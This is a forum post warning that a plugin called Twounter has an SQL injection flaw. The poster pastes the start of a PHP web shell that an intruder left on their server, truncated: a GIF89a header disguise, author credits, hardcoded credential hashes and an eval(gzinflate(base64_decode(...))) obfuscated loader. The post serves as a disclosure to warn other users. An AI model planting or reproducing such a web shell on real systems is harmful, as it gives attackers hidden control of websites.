[Plugin: Twounter] Attention! Security issue, Sql Injection!!
-
===== CAUTION, DON’T USE THIS PLUGIN =====
I found a security issue with this plugin, this problem enabled a hacker making a Sql Injection on my website, please check it!
Here is the .php file that the “hacker” leave on my root, please contact me if you want the complete file.
GIF89a;
<?php/******************************************************************************************************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/* на [email protected]. Все предложения будут рассмотрены.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC https://rst.void.ru , https://ghc.ru
/******************************************************************************************************/
$language=’eng’;
$auth = 0;
$name=’d41d8cd98f00b204e9800998ecf8427e’;
$pass=’d41d8cd98f00b204e9800998ecf8427e’;
eval(gzinflate(base64_decode(‘7b1ZVyNJ0ij4nJzDf4hS0yWpUgitgCChEoQAsSOJNTOHDkUEUkBIoVJIgKjOPzcv8zfuuWde5m3uzA+YMTN3j/DYxFJZ3dX3fnRnSXI3Nzc3NzM3N9+M4dAe3gyNgT0cmf1OKpdenZ1xjNFNT+2Y2s1vY3tkODfDcX9k9gyW+xmz8eeNZfbMEU80++YNZKSSPfXpxngytPHItPsEl8wEQOzxaDAe3bTHt7fGEGrlAHOOemvc9GzdUNYUgu4gtJuaJKAHY+gAZgBJ5rPFfBLSzNsUT73R7N5AHRqpQXfAk1LpjJIsZfPZXDKtrK0p8/n07IzyO
Thank you!
Sorry, I am French and my english is bad ??
Felipe Roman K.
- The topic ‘[Plugin: Twounter] Attention! Security issue, Sql Injection!!’ is closed to new replies.